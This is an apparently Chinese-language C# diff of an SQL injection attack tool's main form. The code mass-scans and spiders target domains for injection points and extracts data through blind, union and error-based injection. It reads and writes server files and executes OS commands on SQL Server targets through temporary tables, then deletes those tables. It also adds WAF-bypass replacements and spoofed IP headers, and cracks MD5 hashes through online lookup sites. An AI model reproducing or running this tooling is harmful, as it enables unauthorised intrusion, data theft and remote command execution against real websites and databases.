+ this.Invoke(new StringDelegate(file_txt_resultSetText), Tools.StringArrayToString(ver_tmp));
+ }
+ catch (Exception e)
+ {
+
+ Tools.SysLog("获取SQLServer读到的文件内容发生错误!" + e.Message);
+ }
+ }
+
+ public void readOrWriteFileByMySQLByHexAscii(Object param)
+ {
+ String[] ps = param.ToString().Split('#');
+ int index = int.Parse(ps[1].ToString());
+ String tmp_va_payload = MySQL5.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + "");
+ //数字加大写字母的ascii码
+ int ascii = getValue(tmp_va_payload, 48, 90);
+ ver_tmp[index] = ((char)ascii).ToString();
+ String value = Tools.unHex(Tools.convertToString(ver_tmp), "GB2312");
+ this.Invoke(new StringDelegate(file_txt_resultSetText), value);
+
+ }
+
+ public void execCMDBySQLServerByUnicode(Object param)
+ {
+
+ String[] ps = param.ToString().Split('#');
+ int index = int.Parse(ps[1]);
+
+ int len = getValue(MSSQL.bool_length.Replace("{data}", ps[0]), 0, 8);
+
+ int cindex = 1;
+ String temUnicode = "";
+ while (cindex <= len)
+ {
+ String tmp_payload = MSSQL.bool_value.Replace("{data}", "convert(int," + MSSQL.substr.Replace("{data}", ps[0]).Replace("{index}", cindex + "") + ")");
+ //数字加大写字母的ascii码
+ int ascii = getValue(tmp_payload, 0, 9);
+ temUnicode += ascii.ToString();
+ cindex++;
+ }
+ int unicode = Tools.convertToInt(temUnicode);
+
+ ver_tmp[index - 1] = Tools.unHexByUnicode(unicode, "UTF-8");
+ this.Invoke(new StringDelegate(log), "获取到CMD执行结果--" + ver_tmp[index - 1]);
+ }
+
+ public void execCMDBySQLServer()
+ {
+ try
+ {
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "CmdThread-";
+ }
+
+ String cmd = this.cmd_txt_cmd.Text;
+ String cmd_16 = Tools.strToHex(cmd, "GB2312");
+ //执行cmd
+ String cmd_data_payload = MSSQL.createTable.Replace("{cmd}", cmd_16);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cmd_data_payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ this.Invoke(new StringDelegate(log), "报告大侠,CMD命令执行完成,正在等待获取执行结果!");
+ if (config.showCmdResult)
+ {
+ switch (config.injectType)
+ {
+
+ case InjectType.Bool:
+ try
+ {
+ if (String.IsNullOrEmpty(config.key))
+ {
+
+ MessageBox.Show("大侠,请在注入中心,配置Bool盲注的关键字!");
+ return;
+ }
+ String count_payload = MSSQL.bool_value.Replace("{data}", MSSQL.cmdDataCount);
+ int count = getValueByStepUp(count_payload, 0, 50);
+ for (int i = 1; i <= count; i++)
+ {
+ String data_payload = MSSQL.cmdData.Replace("{index}", i + "");
+ String payload_len = MSSQL.bool_length.Replace("{data}", data_payload);
+ int len = getValueByStepUp(payload_len, 0, 100);
+ this.dataCount = len;
+ ver_tmp = new String[len];
+ //获取值
+ for (int j = 1; j <= len; j++)
+ {
+ String dtmp_payload = MSSQL.unicode_value.Replace("{data}", data_payload).Replace("{index}", j + "");
+ MyThreadPool.initThread(new ParameterizedThreadStart(execCMDBySQLServerByUnicode), dtmp_payload + "#" + j);
+ this.currentDataCount = j;
+ }
+ while (status == 1)
+ {
+
+ Thread.Sleep(50);
+ if (MyThreadPool.getCurrentThreadCount() == 0)
+ {
+ if (ver_tmp != null)
+ {
+ break;
+ }
+ }
+ }
+ this.dataCount = len;
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(Tools.StringArrayToString(ver_tmp)) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Union:
+ try
+ {
+ //检查配置
+ if (config.columnsCount <= 0)
+ {
+
+ MessageBox.Show("大侠,请在注入中心,配置Union注入的列数!");
+ return;
+ }
+
+ String data_count = getOneDataByUnionOrError(MSSQL.getUnionDataValueByCMD(config.columnsCount, config.showColumn, MSSQL.cmdDataCount));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,CMD执行后CMD表有" + Tools.convertToInt(data_count) + "行数据,请稍候,正在获取...");
+
+ int count = Tools.convertToInt(data_count);
+ this.dataCount = count;
+ //下标从1开始
+ for (int i = 1; i <= count; i++)
+ {
+ String payload = MSSQL.cmdData.Replace("{index}", i.ToString());
+ String result = getOneDataByUnionOrError(MSSQL.getUnionDataValueByCMD(config.columnsCount, config.showColumn, payload));
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(result) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ this.currentDataCount = i;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Error:
+ try
+ {
+
+ String payload_len = MSSQL.bool_length.Replace("{data}", MSSQL.cmdData);
+ String data_count = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.cmdDataCount));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取CMD命令执行结果!");
+ int count = Tools.convertToInt(data_count);
+ this.dataCount = count;
+ //下标从1开始
+ for (int i = 1; i <= count; i++)
+ {
+ String payload = MSSQL.cmdData.Replace("{index}", i.ToString());
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", payload));
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(result) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ this.currentDataCount = i;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ }
+ }
+ //删除表
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, MSSQL.dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ this.Invoke(new StringDelegate(log), "清除执行命令时创建的临时表完成!");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "执行命令获取结果发生异常:" + e.Message);
+ }
+ this.cmd_btn_start.Text = "开始";
+ status = 0;
+ }
+
+
+ private void file_btn_start_Click(object sender, EventArgs e)
+ {
+ if (status == 0)
+ {
+ if (config.dbType.Equals(DBType.MySQL5) || config.dbType.Equals(DBType.SQLServer))
+ {
+ if (String.IsNullOrEmpty(this.file_txt_filePath.Text))
+ {
+
+ MessageBox.Show("请填写读写文件的磁盘路径!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+ if (!checkConfig())
+ {
+ return;
+ }
+ if (!isSetInjectPoint())
+ {
+ return;
+ }
+ status = 1;
+ this.file_btn_start.Text = "停止";
+ this.currentThread = new Thread(readOrWriteFile);
+ this.currentThread.Start();
+ }
+ else
+ {
+ MessageBox.Show("抱歉,文件读写目前只支持MySQL和SQLServer,并且账户拥有文件读写权限!");
+ }
+ }
+ else
+ {
+
+ StopThread();
+ this.file_btn_start.Text = "开始";
+ }
+
+ }
+
+ private void cmd_btn_start_Click(object sender, EventArgs e)
+ {
+ if (status == 0)
+ {
+ if (config.dbType.Equals(DBType.SQLServer))
+ {
+ if (String.IsNullOrEmpty(this.cmd_txt_cmd.Text))
+ {
+
+ MessageBox.Show("请输入执行的命令!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+
+ status = 1;
+ this.cmd_btn_start.Text = "结束";
+ this.cmd_txt_result.Clear();
+ this.currentThread = new Thread(execCMDBySQLServer);
+ this.currentThread.Start();
+ }
+ else
+ {
+ MessageBox.Show("抱歉,此功能目前只支持SQLServer数据库,并且账户拥有dba权限!");
+ }
+ }
+ else
+ {
+ StopThread();
+ this.cmd_btn_start.Text = "开始";
+ }
+ }
+
+ private void cmd_chk_showCmdResult_CheckedChanged(object sender, EventArgs e)
+ {
+ config.showCmdResult = this.cmd_chk_showCmdResult.Checked;
+ }
+
+ private void file_txt_result_TextChanged(object sender, EventArgs e)
+ {
+ this.file_txt_result.SelectionStart = this.file_txt_result.Text.Length;
+ this.file_txt_result.SelectionLength = 0;
+ this.file_txt_result.ScrollToCaret();
+ }
+
+ private void cmd_txt_result_TextChanged(object sender, EventArgs e)
+ {
+ this.file_txt_result.SelectionStart = this.file_txt_result.Text.Length;
+ this.file_txt_result.SelectionLength = 0;
+ this.file_txt_result.ScrollToCaret();
+ }
+
+ private void bypass_btn_addReplaceStr_Click(object sender, EventArgs e)
+ {
+ if (String.IsNullOrEmpty(this.bypass_txt_replace.Text))
+ {
+
+ MessageBox.Show("大侠,请输入需要替换的字符!");
+ return;
+ }
+
+ if (this.bypass_txt_replace.Text.Equals(this.bypass_txt_replaceTo.Text))
+ {
+
+ MessageBox.Show("大侠,两个字符一样的,还需要替换什么,你这是在忽悠我吗!");
+ return;
+ }
+
+ if (!replaceList.ContainsKey(this.bypass_txt_replace.Text))
+ {
+ ListViewItem lvi = new ListViewItem(this.bypass_txt_replace.Text);
+ lvi.SubItems.Add(this.bypass_txt_replaceTo.Text);
+ lvi.Name = this.bypass_txt_replaceTo.Text;
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+
+ replaceList.Add(this.bypass_txt_replace.Text, this.bypass_txt_replaceTo.Text);
+ config.replaceStrs += (this.bypass_txt_replace.Text + "\t" + this.bypass_txt_replaceTo.Text + "\n");
+ }
+ else
+ {
+ MessageBox.Show("大侠,替换字符" + this.bypass_txt_replace.Text + "已经在列表了!");
+ }
+
+
+
+
+ }
+
+ private void bypass_chk_inculdeStr_CheckedChanged(object sender, EventArgs e)
+ {
+ config.inculdeStr = this.bypass_chk_inculdeStr.Checked;
+ }
+
+ private void bypass_delselect_Click(object sender, EventArgs e)
+ {
+ if (this.bypass_lvw_replaceString.SelectedItems != null && this.bypass_lvw_replaceString.SelectedItems.Count > 0)
+ {
+ foreach (ListViewItem lvi in this.bypass_lvw_replaceString.SelectedItems)
+ {
+
+ this.bypass_lvw_replaceString.Items.Remove(lvi);
+ String delStr = lvi.SubItems[0].Text + "\t" + lvi.SubItems[1].Text + "\n";
+ config.replaceStrs = config.replaceStrs.Replace(delStr, "");
+ replaceList.Remove(lvi.SubItems[0].Text);
+
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有选择!");
+ }
+ }
+
+ private void file_cbox_readWrite_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ if ("加载获取IIS虚拟网站信息VBS".Equals(this.file_cbox_readWrite.Text))
+ {
+
+ //加载vbs脚本
+ this.file_txt_filePath.Text = "c:/test.vbs";
+ this.file_txt_result.Text = FileTool.readFileToString("config/GetIISWebInfo.vbs");
+ MessageBox.Show("加载成功,大侠,请选择对应的写文件方法写入VBS!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("读取config/GetIISWebInfo.vbs发生错误!异常信息:" + ee.Message);
+ MessageBox.Show("加载config/GetIISWebInfo.vbs发生错误!");
+ }
+ }
+ //验证key是否正确
+ private void injectConfig_btn_checkKey_Click(object sender, EventArgs e)
+ {
+ Thread t = new Thread(checkTheKey);
+ this.injectConfig_btn_checkKey.Enabled = false;
+ t.Start();
+ }
+
+ public void checkTheKey()
+ {
+
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+
+ bool truep = findKeyInBody(Comm.truePayload);
+ bool falsep = findKeyInBody(Comm.falsePayload);
+ if (truep == true && falsep == false)
+ {
+ MessageBox.Show("关键字设置正确!");
+ }
+ else
+ {
+
+ MessageBox.Show("此关键字设置错误,无法通过此关键字获取数据!请查看HTTP发包记录是否存在乱码,检查编码设置是否正确;可能此关键字同时在真假条件上出现,请更换关键字!");
+ }
+ }
+ }
+ this.injectConfig_btn_checkKey.Enabled = true;
+ }
+
+ private void bypass_cbox_sendHTTPSleepTime_TextChanged(object sender, EventArgs e)
+ {
+ config.sendHTTPSleepTime = Tools.convertToInt(this.bypass_cbox_sendHTTPSleepTime.Text);
+ }
+
+ private void bypass_cbox_randIPToHeader_TextChanged(object sender, EventArgs e)
+ {
+ config.randIPToHeader = this.bypass_cbox_randIPToHeader.Text;
+ }
+
+ private void encode_cbox_encode_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ String encode = this.encode_txt_input.Text;
+ if (this.encode_cbox_encode.SelectedIndex != 0)
+ {
+
+ if (String.IsNullOrEmpty(encode))
+ {
+ MessageBox.Show("请输入要编码的字符!");
+ this.encode_txt_input.Focus();
+ }
+ }
+
+ switch (this.encode_cbox_encode.SelectedIndex)
+ {
+ case 1:
+ this.encode_txt_result.Text = System.Web.HttpUtility.UrlEncode(encode);
+ break;
+ case 2:
+ this.encode_txt_result.Text = Convert.ToBase64String(Encoding.UTF8.GetBytes(encode));
+ break;
+ case 3:
+ this.encode_txt_result.Text = Tools.stringToAscii(encode);
+ break;
+ case 4:
+ this.encode_txt_result.Text = Tools.strToHex(encode, "UTF-8");
+ break;
+ case 5:
+ md5();
+ break;
+
+ }
+ }
+ catch (Exception ep)
+ {
+
+ log("编码发生异常!" + ep.Message);
+
+ }
+ }
+
+ private void encode_cbox_decode_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ String decode = this.encode_txt_input.Text;
+ if (this.encode_cbox_decode.SelectedIndex != 0)
+ {
+
+ if (String.IsNullOrEmpty(decode))
+ {
+ MessageBox.Show("请输入要解码的字符!");
+ this.encode_txt_result.Focus();
+ }
+ }
+
+ switch (this.encode_cbox_decode.SelectedIndex)
+ {
+ case 1:
+ this.encode_txt_result.Text = System.Web.HttpUtility.UrlDecode(decode);
+ break;
+ case 2:
+ this.encode_txt_result.Text = Encoding.UTF8.GetString(Convert.FromBase64String(decode));
+ break;
+ case 3:
+ MessageBox.Show("多个ascii需使用空格隔开!");
+ this.encode_txt_result.Text = Tools.asciiToString(decode);
+ break;
+ case 4:
+ this.encode_txt_result.Text = Tools.unHex(decode, "UTF-8");
+ break;
+ case 5:
+ log("----------------正在进行在线MD5解密----------------");
+ log("----------------正在查找www.cmd5.com---------------");
+ this.encode_txt_result.Text = "";
+ this.encode_txt_result.Text += "www.cmd5.com查询结果:" + OnlineMD5.decodeMD5_cmd5(this.encode_txt_input.Text) + "\r\n";
+ log("----------------正在查找www.md5.com.cn--------------");
+ this.encode_txt_result.Text += "www.md5.com.cn查询结果:" + OnlineMD5.decodeMD5_md5_com_cn(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.xmd5.org----------------");
+ this.encode_txt_result.Text += "www.xmd5.org查询结果:" + OnlineMD5.decodeMD5_xmd5_org(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.somd5.com---------------");
+ this.encode_txt_result.Text += "www.somd5.com查询结果:" + OnlineMD5.decodeMD5_somd5_com(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.md5.cc------------------");
+ this.encode_txt_result.Text += "www.md5.cc查询结果:" + OnlineMD5.decodeMD5_md5_cc(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.pmd5.com------------------");
+ this.encode_txt_result.Text += "www.pmd5.cm查询结果:" + OnlineMD5.decodeMD5_pmd5_com(this.encode_txt_input.Text);
+ break;
+
+ }
+ }
+ catch (Exception ep)
+ {
+
+ log("解码发生异常!" + ep.Message);
+ }
+ }
+ public void checkTheKey(ServerInfo trueServer, ServerInfo falseServer, ServerInfo oldServer)
+ {
+
+ //判断关键字,body中的词
+ String key = Tools.findKeyByStr(trueServer.body, falseServer.body, oldServer.body);
+ this.chk_inject_reverseKey.Checked = false;
+ //如果为空反过来查找
+ if (String.IsNullOrEmpty(key))
+ {
+ this.Invoke(new StringDelegate(log), "Body响应内容中正向查找未发现盲注关键字!");
+ this.chk_inject_reverseKey.Checked = true;
+ key = Tools.findKeyByStr(falseServer.body, trueServer.body, oldServer.body);
+ if (String.IsNullOrEmpty(key))
+ {
+ this.Invoke(new StringDelegate(log), "Body响应内容中反向查找未发现盲注关键字!");
+ this.chk_inject_reverseKey.Checked = false;
+ }
+ }
+ if (!String.IsNullOrEmpty(key))
+ {
+ this.cbox_inject_type.SelectedIndex = 0;
+ this.txt_inject_key.Text = key;
+ this.Invoke(new StringDelegate(log), "发现盲注关键字!" + key);
+ return;
+ }
+
+ //状态码判断
+ int code = Tools.findKeyByCode(trueServer.code, falseServer.code);
+ if (code == 0)
+ {
+ this.Invoke(new StringDelegate(log), "响应状态码不能作为盲注判断条件!");
+
+ }
+ else
+ {
+ this.cbox_inject_type.SelectedIndex = 1;
+ this.txt_inject_key.Text = key;
+ this.Invoke(new StringDelegate(log), "响应状态码可以作为盲注判断条件!");
+ return;
+ }
+
+ //时间判断
+
+ if (trueServer.runTime < config.maxTime && falseServer.runTime < config.maxTime)
+ {
+ this.cbox_inject_type.SelectedIndex = 2;
+ this.txt_inject_key.Text = config.maxTime.ToString();
+ this.Invoke(new StringDelegate(log), "逻辑为真的响应时间可以作为盲注判断条件!");
+ return;
+ }
+ if (falseServer.runTime < config.maxTime && trueServer.runTime < config.maxTime)
+ {
+ this.cbox_inject_type.SelectedIndex = 2;
+ this.txt_inject_key.Text = config.maxTime.ToString();
+ this.chk_inject_reverseKey.Checked = true;
+ this.Invoke(new StringDelegate(log), "逻辑为假的响应时间可以作为盲注判断条件!");
+ return;
+ }
+ this.Invoke(new StringDelegate(log), "没有发现盲注判断条件,请检查注入标记、编码等基础配置是否正确!");
+ }
+
+ private void inject_btn_autoFindKey_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ if (config.request.IndexOf(setInjectStr) == -1)
+ {
+
+ MessageBox.Show("大侠,请标记注入后,程序才能自动查找关键字!");
+ return;
+ }
+ if (config.request.IndexOf("") == -1)
+ {
+
+ MessageBox.Show("大侠,请将注入标记范围内参数标记编码,程序才能对标记编码范围内的数据进行URL编码,否则有错误!");
+ return;
+ }
+ this.inject_btn_autoFindKey.Enabled = false;
+ ServerInfo trueServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, Comm.truePayload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ ServerInfo falseServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, Comm.falsePayload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ checkTheKey(trueServer, falseServer, trueServer);
+ this.Invoke(new StringDelegate(log), "自动查找关键字完成!");
+
+ }
+ catch (Exception ep)
+ {
+ this.Invoke(new StringDelegate(log), "自动查找关键字发生异常!" + ep.Message);
+ }
+ this.inject_btn_autoFindKey.Enabled = true;
+ }
+
+ private void scanInjection_importDomains_Click(object sender, EventArgs e)
+ {
+ if (addStatus == 0) {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "文本文件(*.txt)|*.txt" };
+ if (ofd.ShowDialog() == DialogResult.OK )
+ {
+ this.scan_list.Clear();
+ this.scanInjection_txt_domainsPath.Text = ofd.FileName;
+ addStatus = 1;
+ Thread th = new Thread(new ParameterizedThreadStart(addItemToScanDomain));
+ th.Start(ofd.FileName);
+ }
+ }
+ else {
+ MessageBox.Show("加载任务未完成。");
+ }
+ }
+ public int addStatus = 0;
+ public void addItemToScanDomain(Object path) {
+ this.scan_list = FileTool.readDomainToList(path.ToString(), true);
+ this.scanInjection_domainsCount.Text = this.scan_list.Count + "";
+ int i = 0;
+ comm_count = this.scan_list.Count;
+ foreach (String url in this.scan_list)
+ {
+ this.scanInject_lsb_links.Items.Add(url);
+ i++;
+ comm_currentCount = i;
+ }
+ addStatus = 0;
+ MessageBox.Show("加载列表完成!");
+ }
+
+ Thread scanedThread = null;
+
+
+ public void stopScan()
+ {
+ Main.status = -1;
+ this.scanInjection_btn_scan.Enabled = false;
+ this.scanInjection_btn_scan.Text = "正在停止";
+ while (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+
+ Thread.Sleep(100);
+ }
+ this.scanInjection_btn_scan.Text = "开始扫描";
+ this.scanInjection_btn_scan.Enabled = true;
+ Main.status = 0;
+ Thread.CurrentThread.Abort();
+ }
+
+ public void stopSpider()
+ {
+ Main.status = -1;
+ this.scanInjection_btn_spider.Enabled = false;
+ this.scanInjection_btn_spider.Text = "正在停止";
+ while (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+
+ Thread.Sleep(100);
+ }
+ this.scanInjection_btn_spider.Text = "爬行链接";
+ this.scanInjection_domainsCount.Text = this.scanInject_lsb_links.Items.Count.ToString();
+ this.scanInjection_btn_spider.Enabled = true;
+ Main.status = 0;
+ Thread.CurrentThread.Abort();
+ }
+ public void spider()
+ {
+ foreach (String url in scan_list)
+ {
+ //爬行
+ MyThreadPool.initThread(new ParameterizedThreadStart(spiderURLs), url, url + "----" + scanedDomain);
+ scanedDomain++;
+ }
+ stopSpider();
+ }
+ public void scan()
+ {
+ //扫描
+ HashSet testURL = new HashSet();
+ foreach (String url in this.scanInject_lsb_links.Items)
+ {
+ if (url.IndexOf("?") != -1)
+ {
+ if (!testURL.Contains(url))
+ {
+ testURL.Add(url);
+ MyThreadPool.initThread(new ParameterizedThreadStart(scanInject), url);
+ scanedURLSCount++;
+ }
+ else {
+ this.Invoke(new StringDelegate(log), url+"----此URL以检测过了,自动跳过!");
+ }
+ }
+ }
+ stopScan();
+ }
+ public int urlSumCount = 0;//待扫url
+ public int scanedURLSCount = 0;//已扫
+
+ public String GetOneURL(List mylist, int index) {
+ try
+ {
+ if (!String.IsNullOrEmpty(mylist[index]))
+ {
+ return mylist[index];
+ }
+ }
+ catch (Exception e) {
+
+ }
+
+ return "";
+ }
+
+ public void spiderURLs(object url)
+ {
+ try
+ {
+ Spider.config = config;
+ Spider sp = new Spider();
+ if (this.scanInect_chk_isSpider.Checked)
+ {
+ sp.findLinks(url.ToString());
+ }
+ else
+ {
+ sp.AllURL.Add(url.ToString());
+ }
+ int count = 0;
+ int s = sp.AllURL.Count;//第一次URL总数
+ int spindex = 0;//爬行下标
+ int index = 0;
+ HashSet addURLs = new HashSet();
+ do
+ {
+
+ if (index >= s)
+ {
+ //不够数量继续爬行
+ if (count < config.maxSpiderCount)
+ {
+ String surl = GetOneURL(sp.AllURL, spindex);
+ if (!String.IsNullOrEmpty(surl)) {
+ sp.findLinks(surl);
+ spindex++;
+ }
+ }
+ }
+
+ String curl = GetOneURL(sp.AllURL, index);
+ if (curl.IndexOf("?") != -1)
+ {
+ this.Invoke(new StringDelegate(addItemToListBox), curl);
+ count++;
+ }
+ index++;
+
+ } while (count < config.maxScanCount&&sp.AllURL.Count> spindex) ;
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "发生异常----" + e.Message);
+ }
+
+ }
+
+
+ public void scanInject(Object ourl)
+ {
+ Injection injection = InjectionTools.testInjection(ourl.ToString(), this.config, this.scanInect_chk_scanError.Checked);
+ if (injection.isInjection)
+ {
+ this.Invoke(new StringDelegate(log), ourl + "存在注入点!");
+ injectionURLCount++;
+ injection.url = ourl.ToString();
+ injection.index = injectionURLCount;
+ this.Invoke(new addScanInjectionResultDelegate(addScanInjectionResult), injection);
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), ourl + "不存在注入点!");
+ }
+
+
+ }
+
+ delegate void addScanInjectionResultDelegate(Injection inj);
+ public void addScanInjectionResult(Injection inj)
+ {
+
+ ListViewItem lvi = new ListViewItem(inj.index + "");
+ lvi.SubItems.Add(inj.url);
+ lvi.SubItems.Add(inj.testUrl);
+ lvi.SubItems.Add(inj.paramName);
+ lvi.SubItems.Add(inj.injectType);
+ lvi.SubItems.Add(inj.dbType);
+ lvi.SubItems.Add(inj.remark);
+ this.scanInjection_lvw_result.Items.Add(lvi);
+ }
+
+ public int scanedDomain = 0;
+ private void timer_scanInjection_Tick(object sender, EventArgs e)
+ {
+ this.scanInjection_findURLSCount.Text = urlSumCount + "";
+ this.scanInjection_scanedURLSCount.Text = scanedURLSCount + "";
+ this.scanInjection_scanedDomainCount.Text = this.scanedDomain + "";
+ }
+
+ private void openScanURL(int index) {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ string target = this.scanInjection_lvw_result.SelectedItems[0].SubItems[index].Text;
+
+ try
+ {
+
+ System.Diagnostics.Process.Start("IEXPLORE.EXE", target);
+
+ }
+ catch (Exception oe)
+ {
+ MessageBox.Show("无法打开IE---" + oe.Message);
+ }
+ }
+
+
+
+ private void scanInjection_lvw_result_DoubleClick(object sender, EventArgs e)
+ {
+ openScanURL(2);
+ }
+
+ private void scanInjection_cms_exportResult_Click(object sender, EventArgs e)
+ {
+
+ exportScanURL(null);
+ }
+
+
+ public void exportScanURL(int[] cols){
+ if (export == 0)
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.txt";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ exportInjectData(saveFileDialog.FileName,cols);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请稍候,还有导出任务正在进行!");
+ }
+ export = 0;
+ }
+
+ public void exportInjectData(Object path,int[] cols)
+ {
+ try
+ {
+ FileStream fs = new FileStream(path.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ String columns = "";
+ if (cols==null)
+ {
+ foreach (ColumnHeader dc in this.scanInjection_lvw_result.Columns)
+ {
+ columns += (dc.Text + "#");
+ }
+ sw.WriteLine(columns);
+ }
+
+ foreach (ListViewItem sv in this.scanInjection_lvw_result.Items)
+ {
+ StringBuilder sb = new StringBuilder();
+ if (cols == null)
+ {
+ foreach (ListViewItem.ListViewSubItem subv in sv.SubItems)
+ {
+
+ sb.Append(subv.Text);
+ sb.Append("----");
+ }
+ }
+ else {
+
+
+ for (int i=0;i< cols.Length;i++)
+ {
+ sb.Append(sv.SubItems[cols[i]].Text);
+ sb.Append("----");
+ }
+ }
+
+ sb.Remove(sb.Length - 4, 4);
+ sw.WriteLine(sb.ToString());
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("导出数据发生异常!" + e.Message);
+ MessageBox.Show("导出数据发生异常!");
+ }
+ export = 0;
+
+ }
+
+ private void scanInjection_cms_copyURL_Click(object sender, EventArgs e)
+ {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ Clipboard.SetText(this.scanInjection_lvw_result.SelectedItems[0].SubItems[1].Text);
+ MessageBox.Show("复制成功!");
+ }
+
+ private void scanInjection_cms_delThisLine_Click(object sender, EventArgs e)
+ {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ foreach (ListViewItem selitem in this.scanInjection_lvw_result.SelectedItems) {
+ this.scanInjection_lvw_result.Items.Remove(selitem);
+ }
+ }
+
+ private void scanInjection_cms_clearResult_Click(object sender, EventArgs e)
+ {
+ this.scanInjection_lvw_result.Items.Clear();
+ }
+
+ public void loadList(Object path)
+ {
+ //load
+ FileStream fs_dir = null;
+ StreamReader reader = null;
+ urlSumCount = 0;
+ try
+ {
+ fs_dir = new FileStream(path.ToString(), FileMode.Open, FileAccess.Read);
+
+ reader = new StreamReader(fs_dir);
+
+ String lineStr;
+
+ while ((lineStr = reader.ReadLine()) != null)
+ {
+ this.Invoke(new StringDelegate(addItemToListBox), lineStr);
+ urlSumCount++;
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ loadListStatus = 0;
+ }
+
+ }
+ public void addItemToListBox(String item)
+ {
+ if (!this.scanInject_lsb_links.Items.Contains(item)) {
+ this.scanInject_lsb_links.Items.Add(item);
+ urlSumCount++;
+ }
+ }
+
+ private void scanInjection_txtURLList_DoubleClick(object sender, EventArgs e)
+ {
+ if (loadListStatus == 0)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "文本文件(*.txt)|*.txt" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+ this.scanInject_lsb_links.Items.Clear();
+ Thread th = new Thread(loadList);
+ loadListStatus = 1;
+ th.Start(ofd.FileName);
+ }
+ }
+ else
+ {
+ MessageBox.Show("上次导入任务还未结束,请稍后!");
+ }
+ }
+
+ private void encode_txt_encode_TextChanged(object sender, EventArgs e)
+ {
+ md5();
+ }
+
+ private void md5()
+ {
+ if (this.encode_cbox_encode.SelectedIndex == 5)
+ {
+ this.encode_txt_result.Text = "16位md5:" + Tools.md5_16(this.encode_txt_input.Text) + "\r\n32位md5:" + Tools.md5_32(this.encode_txt_input.Text);
+ this.encode_txt_result.Text += "\r\n小写16位md5:" + Tools.md5_16(this.encode_txt_input.Text).ToLower() + "\r\n小写32位md5:" + Tools.md5_32(this.encode_txt_input.Text).ToLower();
+ }
+ }
+
+ private void log_lvw_httpLog_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ if (this.log_lvw_httpLog.SelectedItems.Count > 0)
+ {
+ try
+ {
+ String tag = this.log_lvw_httpLog.SelectedItems[0].Tag.ToString();
